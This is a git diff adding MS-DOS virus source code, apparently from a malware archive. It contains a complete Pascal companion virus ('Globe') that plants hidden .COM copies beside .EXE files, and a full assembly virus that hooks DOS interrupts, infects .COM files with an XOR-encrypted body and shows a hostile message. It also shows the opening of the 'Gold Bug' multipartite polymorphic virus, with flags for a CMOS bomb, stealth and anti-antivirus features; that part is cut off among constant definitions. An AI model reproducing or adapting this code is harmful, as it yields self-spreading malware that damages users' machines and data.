a/MSDOS/Virus.MSDOS.Unknown.globe.pas b/MSDOS/Virus.MSDOS.Unknown.globe.pas new file mode 100644 index 00000000..8548e5bc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.globe.pas @@ -0,0 +1,106 @@ +Program Worm; + +{$M 2048,0,4096} + +Uses Dos, Crt; + +Var F1 : File; + F2 : File; + O : String; + Parm : String; + P : DirStr; + N : NameStr; + E : ExtStr; + Buf : Array[0..8000] of Byte; + NumRead : Word; + NumWritten : Word; + DirInfo : SearchRec; + ComExist : SearchRec; + Infect : Byte; + +Procedure StartOrigExe; +Begin + O := ParamStr(0); + FSplit(O,P,N,E); + O := P+N+'.EXE'; + P := ''; + For NumRead := 1 To ParamCount Do + P := P + ParamStr(NumRead); + SwapVectors; + Exec(O,P); + SwapVectors; +End; + +Procedure InfectExe; +Begin +FindFirst('*.EXE',Archive,DirInfo); +While (DosError = 0) And (Infect <> 0) Do + Begin + FSplit(DirInfo.Name,P,N,E); + O := P+N+'.COM'; + FindFirst(O,Hidden,ComExist); + If DosError <> 0 Then + Begin + Assign(F1,O); + Rewrite(F1,1); + BlockWrite(F1,buf,NumRead,NumWritten); + Close(F1); + SetFattr(F1,Hidden); + Dec(Infect); + End; + FindNext(DirInfo); + End; +End; + +Procedure Activate; +Var + T1,T2 : Integer; + I : Real; + X , Y : Byte; + Resolution : Integer; + +Begin +ClrScr; +I := 0; +T2 := 38; +Randomize; +Repeat +Resolution := 50; +For T1 := 0 to Resolution Do + Begin + X := Abs(40+Round(Sin(I)*T2)); + Y := Abs(12-Round(Cos(I)*10)); + GotoXY(X,Y); + Write(''); + I := I + ((Pi*2)/Resolution); + End; + T2 := T2 - 1; + TextColor(Random(14)+1); +Until T2 < 2; +GotoXY(30,12); +TextColor(White); +Write('* The Globe Virus *'); + Asm + Mov Ah,8 + Int 21h + End; +ClrScr; +End; + +Begin + Infect := 3; + Randomize; + Assign(F2,ParamStr(0)); + Reset(F2,1); + BlockRead(F2,buf,SizeOf(buf),NumRead); + Close(F2); + InfectExe; + StartOrigExe; + If Random(16) = 0 then Activate; + Halt(DosExitCode); +End. + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.gmb.asm b/MSDOS/Virus.MSDOS.Unknown.gmb.asm new file mode 100644 index 00000000..4a3f122a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gmb.asm @@ -0,0 +1,895 @@ +CODE segment para public 'code' + assume cs:code,ds:code,es:nothing,ss:nothing + + org 100h + +egy equ 1 ; one +dma equ 0b0h +atvar equ 300 ; at paramaeter +xtvar equ 1 ; xt parameter +suruseg equ 255 ; density +idotartalek equ 18*30 ; time delay + +start: db 0e9h,0,0 +;##################### Initialization ###################### +resid: push ax + mov cx,offset memory - offset begin ;#### decoding #### + mov bx,ds:[101h] + add bx,103h+(offset begin-offset resid) +jhg1: xor byte ptr [bx],0 + inc bx + loop jhg1 + +begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin) + mov cs:[0feh],bx + mov ax,[bx+(offset eltarol-offset resid)] + mov cl,[bx+(offset eltarol-offset resid)+2] + mov ds:[100h],ax + mov ds:[102h],cl + mov cx,0b800h + mov ah,15 + push bx + int 10h + pop bx + cmp al,7 + jne rety + mov ch,0b0h +rety: mov [bx+(offset ruut - offset resid)+1],cx + mov word ptr [bx+(offset counter-offset resid)],idotartalek + mov byte ptr [bx+(offset jammed-offset resid)+1],al + mov byte ptr [bx+(offset vanesik-offset resid)],0 + xor ax,ax + mov ds,ax + cmp word ptr ds:[130h],4142h + je zipp + mov ds:[130h],4142h + mov ax,cs + dec ax + mov ds,ax + mov ax,ds:[3] + sub ax,180h + mov ds:[3],ax + add ax,ds:[1] + mov es,ax + push cs + pop ds + sub word ptr ds:[2],384 + mov di,3 + mov si,bx + mov cx,(offset memory-offset resid) shr 1 +1 + cld + rep movsw + mov ax,es + sub ax,10h + mov ds,ax + mov dx,offset irq + mov ax,251ch + int 21h + mov ah,2ah + int 21h + cmp al,1 + jne zipp + dec al + out 0a0h,al + mov al,dma + out 41h,al +zipp: + mov ax,cs + mov ds,ax + mov es,ax + pop ax + push cs + mov cx,100h + push cx + mov cx,ds:[0feh] + sub cx,100h + retf +eltarol dw 20cdh +eltarol2 db 90h + +;######################### Vyrus activated ########################## +csik: mov ax,0e000h + mov ds,ax +csiky: mov ds:[0],al + inc al + jmp csiky + +;######################### propagation part ########################## + +eredeti: db 0eah ; original +int211 dw 0 +int212 dw 0 +counter dw 0 +szaporodas: cmp ah,4bh + jne eredeti + or al,al + jnz eredeti + push ax + push es + push bx + push ds + push dx + mov bx,dx +koj: inc bx + cmp byte ptr [bx],'.' + jne koj + cmp byte ptr[bx+1],'C' + jne kiugras1 + mov cs:kds,ds + mov cs:kdx,dx + mov cs:kbx,bx + call probe +kiugras1: pop dx + pop ds + pop bx + pop es + pop ax + jmp eredeti +kds dw 0 +kdx dw 0 +kbx dw 0 +kkk dw 0 +fszam dw 0 +probe: push cs + pop es + mov di,offset memory + mov si,dx + mov cx,40 + cld + rep movsw + mov bx,0ff0h + mov ah,48h + int 21h + jnc juk1 + ret + ;!!!!! memoria lefoglalva (kkk = Seg) +atr dw 0 +juk1: mov cs:kkk,ax + mov dx,offset memory + push ds + pop es + mov bx,cs:kbx + mov byte ptr [bx+1],'A' ; + call elorutin + push cs + pop ds ;DS:DX a masolt nev. + mov ax,4300h + int 21h + mov atr,cx + xor cx,cx + mov ax,4301h + int 21h + ;!!!!! Attr allitas + cmp cs:attrflag,0 + jz juk2 + mov ds,cs:kds + jmp memoff +juk2: mov di,kdx ;ES:DI a regi nev atirva + mov ah,56h + int 21h + call utorutin ;!!!!! Atnevezve + mov dx,cs:kdx + push es + pop ds + mov ax,3d02h + int 21h ;!!!!! File megnyitva + mov cs:fszam,ax + mov ds,cs:kkk + xor dx,dx + mov bx,ax + mov cx,0fc00h-(offset memory-offset resid) + mov ah,3fh + int 21h + cmp ax,0fc00h-(offset memory-offset resid) + ;!!!!! Beolvasva a program (csak a hossza miatt) + je hosszu ;zarjuk le a file-t + cmp ax,7580 + jb hosszu ;tul rovid a file + mov di,ax + + mov bx,ds:[1] + cmp word ptr [bx+3],0b950h + +;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$ + + je hosszu + push di + mov cx,(offset memory-offset resid) + mov si,offset resid + push ds + pop es + push cs + pop ds + inc byte ptr ds:[offset jhg1 +2] + mov ax,es:[0] + mov eltarol,ax + mov al,es:[2] + mov eltarol2,al + rep movsw ;!!!!! Atmasolva (hehe) + mov al,byte ptr ds:[offset jhg1 +2] + pop di + add di,(offset begin-offset resid) + mov cx,offset memory - offset begin ;#### coding #### +jhga: xor byte ptr es:[di],al + inc di + loop jhga + sub di,(offset memory - offset resid) + push di ;Az ugrasi hely + mov bx,fszam + mov cx,offset memory - offset begin + mov dx,di + push es + pop ds + mov ah,40h + int 21h + pop di + cmp ax,offset memory - offset begin + je ghj1 +hosszu: jmp zardle +ghj1: ;!!!!! Kiirva a vege + mov byte ptr ds:[0],0e9h + sub di,3 + mov ds:[1],di + mov bx,cs:fszam + xor cx,cx + xor dx,dx + mov ax,4200h + push bx + int 21h + pop bx + mov cx,3 + xor dx,dx + mov ah,40h + int 21h +zardle: mov bx,cs:fszam + mov ah,3eh + int 21h ;!!!!! File lezarva + push cs + pop es + mov di,offset memory + mov ds,cs:kds + mov dx,cs:kdx + mov ah,56h + int 21h ;!!!!! File visszanevezve + mov bx,cs:kbx + mov byte ptr ds:[bx+1],'C' + mov ax,4301h + mov cx,cs:atr + int 21h ;!!!!! attr visszaall +memoff: mov bx,cs:kbx + mov byte ptr ds:[bx+1],'C' + push cs + pop ds + mov es,cs:kkk + mov ah,49h + int 21h ;!!!!! Memoria visszaalt + ret +it241 dw 0 +it242 dw 0 +attrflag db 0 + +elorutin: mov cs:attrflag,0 + xor ax,ax + mov ds,ax + mov ax,ds:[90h] + mov cs:it241,ax + mov ax,ds:[92h] + mov cs:it242,ax + mov ds:[90h],offset it24 + mov ds:[92h],cs + ret + +utorutin: xor ax,ax + mov ds,ax + mov ax,cs:it241 + mov ds:[90h],ax + mov ax,cs:it242 + mov ds:[92h],ax + ret +it24: mov cs:attrflag,1 + xor al,al + iret +vanesik db 0 +irq: cli + push ds + push es + push ax + push bx + push cx + push dx + push si + push di + cmp cs:counter,0 + je sabad + dec cs:counter + jne sabad + xor ax,ax + mov ds,ax + mov ax,ds:[84h] + mov cs:int211,ax + mov ax,ds:[86h] + mov cs:int212,ax + mov ds:[84h],offset szaporodas + mov ds:[86h],cs +sabad: cmp cs:vanesik,0 + je keress + call idovan + jmp jumper +keress: call ruut +jumper: pop di + pop si + pop dx + pop cx + pop bx + pop ax + pop es + pop ds + iret + +idovan: xor ah,ah + int 1ah + and dx,suruseg + jne rutyi + call action +rutyi: ret + + +ruut: mov ax,0b800h + mov es,ax + mov di,cs:did + mov cx,512 + cld +poke: jcxz huy + mov al,'E' + repnz scasb + jz talalt +huy: cmp di,4095 + jb kisebb + mov cs:did,0 + ret +kisebb: add cs:did,512 + ret +did dw 0 +talalt: test di,1 + jz poke + mov dl,es:[di+1] + mov dh,es:[di+3] + or dx,2020h + cmp dx,6973h ;'is' + jne poke + mov bl,es:[di+5] + or bl,20h + cmp bl,'k' + jne poke + mov cs:vanesik,1 + jmp huy +action: mov ax,cs + mov ds,ax + mov es,ax + mov vanesik,0 + mov pontszam,1 + mov si,offset zizi + mov di,offset novi + cld + mov cx,6 + rep movsw + call zoldseg +jammed: mov ax,3 + int 10h + cmp counterr,atvar + jne fdr + push cs + pop es + lea bx,mess + mov ax,1301h + mov bx,1 + xor dx,dx + mov cx,offset drt-offset mess + int 10h +fdr: ret + +counterr dw 0 +zoldseg: cli + mov di,offset memory + xor ax,ax + cld + mov cx,200*3 + rep stosw + mov ah,0c0h + mov si,3333h + int 15h + cmp si,3333h + mov ax,xtvar + je xt + mov ax,atvar +xt: mov counterr,ax + mov ax,3502h + int 21h + cmp bx,0e9eh + jne ibm + call init1 + mov pontm,100 + mov port,22h + jmp entry +ibm: ;Ibm bulik + mov pontm,200 + mov al,70h + mov port,60h ;% + mov ah,15 + int 10h + cmp al,7 + jne cga + call init3 + jmp entry +cga: call init2 + jmp entry +port dw 22h +pontm dw 100 + +init1: mov ax,200h + mov es,ax + xor di,di + mov cx,4000h + cld + xor ax,ax + rep stosw + mov plotdw,offset plot + mov unplotdw,offset unplot + ret +init2: mov ax,0b800h + mov es,ax + mov ax,6 + int 10h + mov plotdw,offset plotcga + mov unplotdw,offset unplotcga + ret +init3: mov ax,0b000h + mov es,ax + call prog + mov plotdw,offset plotherc + mov unplotdw,offset unplotcga + ret +prog: mov dx,3bfh + mov al,3 + out dx,al + mov al,28h + mov dx,3b8h + out dx,al + mov ah,0 + mov cx,12 + lea bx,ports +lopi1: mov dx,03b4h + mov al,ah + out dx,al + inc ah + mov dx,03b5h + mov al,[bx] + out dx,al + inc bx + loop lopi1 + + mov dx,3bfh + mov al,3 + out dx,al + mov dx,3b8h + mov al,0ah + out dx,al + xor di,di + mov cx,4000h + xor ax,ax + cld + rep stosw + ret + +ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0 + +;**************************** Forgatorutin ************************************ + + even +sina dw 0 +cosa dw 0 ;si-t meghagyja +sinb dw 0 +cosb dw 0 +pontszam dw 1 +transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB +; add bx,ytol ;ez itt jolesz + shl di,1 + shl bx,1 ;X es Y elokeszitese a szorzashoz + mov ax,di + imul cosa + mov bp,dx + mov ax,bx + imul sina + add bp,dx ; bp=X' = cosa*X + sina*Y + mov ax,bx + imul cosa + mov bx,dx + mov ax,di + imul sina + sub bx,dx ; bx=Y' = cosa*X - sina*Y + shl bp,1 + shl cx,1 ;X' es Z elokeszitese + mov ax,bp + imul cosb + mov di,dx + mov ax,cx + imul sinb + sub di,dx ; di=X'' = cosb*X' - sinb*Z + mov cx,di + mov ax,bx + ret + +comment @ + mov ax,cx + imul cosb + mov cx,dx + mov ax,bp + imul sinb + add cx,dx ; cx=Z'' = cosb*Z = sinb*X' + + ; out: di=X'' bx=Y'' cx=Z'' + mov dx,keptav +;****************************** PERSPEKTIVA ********************************** + mov ax,di + shl ax,1 + imul tavol + mov cx,dx + mov ax,bx + shl ax,1 + imul tavol + mov ax,dx + ret ; ki : CX=X' AX=Y' + +@ + +plotherc: ; al=y cx=x + xor ah,ah + mov dx,ax + shr dx,1 + add ax,dx + mov dx,cx + mov cl,al + and cl,3 + shr ax,1 + shr al,1 + mov di,2000h + shl di,cl + mov cl,90 + mul cl + add di,ax + mov ax,dx + mov cx,dx + jmp ezisi +plotcga: xor di,di + shr ax,1 + jnc tryp + mov di,2000h +tryp: mov dl,80 + mul dl + add di,ax + mov ax,cx +ezisi: shr ax,1 + shr ax,1 + shr ax,1 + add di,ax + and cl,7 + mov al,128 + shr al,cl + or es:[di],al + jmp ezis1 + +unplotcga: mov al,[bx] + mov di,[bx+1] + xor al,255 + and es:[di],al + ret + +plot: ;AL = y koord. cx = x koord. + mov dl,160 + mul dl + mov di,ax + mov ax,cx + shr ax,1 + shr ax,1 + add di,ax + and di,-2 + and cl,7 + mov al,128 + shr al,cl + or es:[di+egy],al +ezis1: mov [bx],al + inc bx + mov [bx],di + add bx,2 + ret +unplot: mov al,[bx] + mov di,[bx+1] + xor al,255 + and es:[di+egy],al + ret +kezdfazisrajz: mov bx,offset memory + mov si,offset gombdata + mov cx,pontszam +ck1: push cx + lodsw + mov cx,ax + shl cx,1 + add cx,320 + lodsw + add si,2 + add ax,50 + call word ptr [plotdw] + pop cx + loop ck1 + ret +indy db 0 + +fazisrajz: mov bx,offset memory + mov si,offset gombdata + mov cx,pontszam + mov indy,1 +ck12: push cx + call word ptr [unplotdw] + push bx + lodsw + mov di,ax + lodsw + mov bx,ax + lodsw + mov cx,ax + call transzform + pop bx + add ax,50 + mov di,bxpo + add al,[di] + shl cx,1 + add cx,bxpo2 + cmp indy,0 + je ruty + mov indy,0 + cmp karal2,0 + jne ruty + push cx + push ax + inc cx + call word ptr [plotdw] + pop ax + pop cx + sub bx,3 +ruty: call word ptr [plotdw] + pop cx + loop ck12 + ret + +novpont: mov ax,pontm + cmp pontszam,ax + je trew + mov cx,pontm + sub cx,pontszam + mov ch,cl + shR cx,1 + shr cx,1 +yut: loop yut + inc pontszam + ret +trew: call movie + mov bx,bxpo + cmp bx,offset patt + je valto + cmp bx,offset patt+29 + je valto +iuy: add bx,novi + mov bxpo,bx + ret +valto: neg novi + jmp iuy +novi dw -1 +bxpo dw offset patt +bxpo2 dw 320 +novi2 dw 4 +karal dw 300 +karal2 dw 600 +zizi dw -1,offset patt,320,4,300,600 +movie: cmp karal,0 + je jesty + dec karal + ret +jesty: cmp karal2,0 + je jesty2 + dec karal2 +jesty2: mov bx,bxpo2 + cmp bx,100 + je valto2 + cmp bx,540 + je valto2 +iuy2: add bx,novi2 + mov bxpo2,bx + ret +valto2: neg novi2 + jmp iuy2 +elokesz: call novpont + mov bl,szogx + xor bh,bh + shl bx,1 + mov ax,sintabl[bx] + mov sina,ax + mov ax,costabl[bx] + mov cosa,ax + mov bl,szogy + xor bh,bh + shl bx,1 + mov ax,sintabl[bx] + mov sinb,ax + mov ax,costabl[bx] + mov cosb,ax + mov al,szogxvalt + add szogx,al + mov al,szogyvalt + add szogy,al + ret + even +szogx db 0 +szogy db 0 +szogxvalt db 2 +szogyvalt db 5 +tavol dw 32767 + +phase: call elokesz + call fazisrajz + ret +entry: call kezdfazisrajz +rajta1: call phase + cmp pontm,100 + je apc + cmp byte ptr ds:[offset ruut +2],0b8h + je ccggaa + mov cx,counterr + mov dx,3bah +qaz1: in al,dx + and al,1 + jnz qaz1 +qaz2: in al,dx + and al,1 + jz qaz2 + loop qaz1 + jmp apc +ccggaa: mov dx,3dah +qaz3: in al,dx + and al,8 + jnz qaz3 +qaz4: in al,dx + and al,8 + jz qaz4 +apc: mov dx,port + in al,dx + and al,1 + jz rajta1 + ret + even +plotdw dw 0 +unplotdw dw 0 + +sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393 + dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279 + dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519 + dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811 + dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898 + dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580 + dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728 + dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285 + dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273 + dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790 + dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005 + dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151 + dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512 + dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410 + dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808 + dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793 + dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204 + dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731 + dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105 + dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113 + dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609 + dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521 + dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852 + dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683 + dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170 + dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530 + dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039 + dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011 + dw -3212, -2410, -1608, -804 +costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285 + dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571 + dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683 + dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731 + dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868 + dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279 + dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179 + dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804 + dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602 + dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793 + dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530 + dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594 + dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790 + dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956 + dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971 + dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757 + dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285 + dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571 + dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683 + dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731 + dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868 + dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279 + dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179 + dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804 + dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602 + dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793 + dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530 + dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594 + dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790 + dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956 + dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971 + dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757 +gombdata: + DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46 + DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25 + DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21 + DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25 + DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0 + DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2 + DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5 + DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12 + DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30 + DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0 + DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44 + DW 33,15,-33,46,12,-14,48,9,7,40,6,29 + DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29 + DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44 + DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0 + DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30 + DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12 + DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5 + DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2 + DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0 + DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25 + DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21 + DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25 + DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46 + DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0 + DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46 + DW 33,15,-33,44,18,-14,44,21,7,35,24,25 + DW 19,26,37,0,29,40,-17,31,34,-29,34,21 + DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25 + DW 3,43,-23,12,45,-17,16,46,-8,15,47,0 + DW 11,48,5,5,49,7,0,49,6,0,49,2 + DW 0,49,0,2,49,0,6,49,0,7,49,5 + DW 5,48,11,0,47,15,-8,46,16,-17,45,12 + DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30 + DW 5,36,-33,21,34,-29,34,31,-17,40,29,0 + DW 37,26,19,25,24,35,7,21,44,-14,18,44 + DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29 + DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29 + DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44 + DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0 + DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30 + DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12 + DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5 + DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2 + DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0 + DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25 + DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21 + DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25 + DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46 + DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0 +patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27 + db 31,35,40,45,50,56,61,67,73,80,86,93 + + + +mess db 'HARD HIT & HEAVY HATE the HUMANS !!' + db ' [ H.H.& H.H. the H. ] ' +drt dw 5 dup (0) +memory: + CODE ENDS + + END START diff --git a/MSDOS/Virus.MSDOS.Unknown.gold-bug.asm b/MSDOS/Virus.MSDOS.Unknown.gold-bug.asm new file mode 100644 index 00000000..3916ff03 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gold-bug.asm @@ -0,0 +1,1083 @@ +cseg segment para public 'code' +gold_bug proc near +assume cs:cseg + +;----------------------------------------------------------------------------- + +;designed by "Q" the misanthrope. + +;----------------------------------------------------------------------------- + +; CAUTION: THIS IS DESTRUCTIVE CODE. YOU SHOULD NOT EVEN BE LOOKING AT IT. +; I HAVE NEVER AND WILL NEVER RELEASE THIS CODE. IF YOU SHOULD BE +; LOOKING AT IT, IT IS BECAUSE IT WAS STOLEN FROM ME. YOU HAVE NO +; RIGHT TO LOOK AT THIS CODE. IF THIS SOURCE SHOULD FALL INTO THE +; WRONG HANDS, IT COULD BE VERY BAD! DESTROY THIS IMMEDIATELY. I +; HOLD NO RESPONSIBILITY FOR WHAT STUPID PEOPLE DO WITH THIS CODE. +; THIS WAS WRITTEN FOR EDUCATIONAL PURPOSES ONLY!!! + +;----------------------------------------------------------------------------- + +.186 +TRUE equ 001h +FALSE equ 000h + +;----------------------------------------------------------------------------- + +;option bytes used and where + +DELETE_SCANNERS equ FALSE ; -2 bytes -2 in com_code +CHECK_FOR_8088 equ TRUE ; 4 bytes 4 in com_code +INFECT_RANDOM equ TRUE ; 4 bytes 4 in com_code +CMOS_BOMB equ TRUE ; 4 bytes 4 in com_code +DEFLECT_DELETE equ TRUE ; 5 bytes 5 in com_code +READING_STEALTH equ TRUE ; 5 bytes 5 in com_code +SAME_FILE_DATE equ TRUE ; 24 bytes 24 in com_code +DOUBLE_DECRIPT equ TRUE ; 26 bytes 26 in com_code +EXECUTE_SPAWNED equ TRUE ; 35 bytes 32 in com_code 3 in boot_code +MODEM_CODE equ TRUE ; 40 bytes 29 in com_code 11 in boot_code +ANTI_ANTIVIRUS equ TRUE ; 46 bytes 35 in com_code 11 in boot_code +POLYMORPHIC equ TRUE ; 90 bytes 74 in com_code 16 in boot_code +MULTIPARTITE equ TRUE ;372 bytes 346 in com_code 26 in boot_code + +;----------------------------------------------------------------------------- + +;floppy boot infection + +FLOPPY_1_2M equ 001h +FLOPPY_760K equ 000h +FLOPPY_TYPE equ FLOPPY_1_2M + +;----------------------------------------------------------------------------- + +IFE MULTIPARTITE +DELETE_SCANNERS equ FALSE +CHECK_FOR_8088 equ FALSE +INFECT_RANDOM equ FALSE +DEFLECT_DELETE equ FALSE +READING_STEALTH equ FALSE +SAME_FILE_DATE equ FALSE +EXECUTE_SPAWNED equ FALSE +POLYMORPHIC equ FALSE +ENDIF + +;----------------------------------------------------------------------------- + +SECTOR_SIZE equ 00200h +RES_OFFSET equ 0fb00h +COM_OFFSET equ 00100h +RELATIVE_OFFSET equ RES_OFFSET-COM_OFFSET +PART_OFFSET equ COM_OFFSET+SECTOR_SIZE +BOOT_OFFSET equ 07c00h +RELATIVE_BOOT equ BOOT_OFFSET-PART_OFFSET +LOW_JMP_10 equ 0031ch +LOW_JMP_21 equ 00321h +SAVE_INT_CHAIN equ 0032ch +SCRATCH_AREA equ 08000h +HEADER_SEGMENT equ 00034h +INT_21_IS_NOW equ 0cch +BIOS_INT_13 equ 0c6h +NEW_INT_13_LOOP equ 0cdh +BOOT_SECTOR equ 001h +DESCRIPTOR_OFF equ 015h +IF FLOPPY_TYPE EQ FLOPPY_1_2M +DESCRIPTOR equ 0f909h +OLD_BOOT_SECTOR equ 00eh +COM_CODE_SECTOR equ 00dh +ELSE +DESCRIPTOR equ 0f905h +OLD_BOOT_SECTOR equ 005h +COM_CODE_SECTOR equ 004h +ENDIF +READ_ONLY equ 001h +SYSTEM equ 004h +DELTA_RI equ 004h +DSR equ 020h +CTS equ 010h +CD equ 080h +FAR_JUMP equ 0eah +MIN_FILE_SIZE equ 00500h +PSP_SIZE equ 00100h +VIRGIN_INT_13_A equ 00806h +VIRGIN_INT_13_B equ 007b4h +VIRGIN_INT_2F equ 00706h +FAR_JUMP_OFFSET equ 006h +SET_INT_OFFSET equ 007h +CHANGE_SEG_OFF equ 009h +VIDEO_MODE equ 00449h +MONOCHROME equ 007h +COLOR_VIDEO_MEM equ 0b000h +ADDR_MUL equ 004h +SINGLE_BYTE_INT equ 003h +VIDEO_INT equ 010h +VIDEO_INT_ADDR equ VIDEO_INT*ADDR_MUL +DISK_INT equ 013h +DISK_INT_ADDR equ DISK_INT*ADDR_MUL +SERIAL_INT equ 014h +DOS_INT equ 021h +DOS_INT_ADDR equ DOS_INT*ADDR_MUL +MULTIPLEX_INT equ 02fh +COMMAND_LINE equ 080h +FIRST_FCB equ 05ch +SECOND_FCB equ 06ch +NULL equ 00000h +GET_PORT_STATUS equ 00300h +WRITE_TO_PORT equ 00100h +HD_0_HEAD_0 equ 00080h +READ_A_SECTOR equ 00201h +WRITE_A_SECTOR equ 00301h +GET equ 000h +SET equ 001h +DELETE_W_FCB equ 01300h +DEFAULT_DRIVE equ 000h +GET_DEFAULT_DR equ 01900h +DOS_SET_INT equ 02500h +FILE_DATE_TIME equ 05700h +DENYNONE equ 040h +OPEN_W_HANDLE equ 03d00h +READ_W_HANDLE equ 03f00h 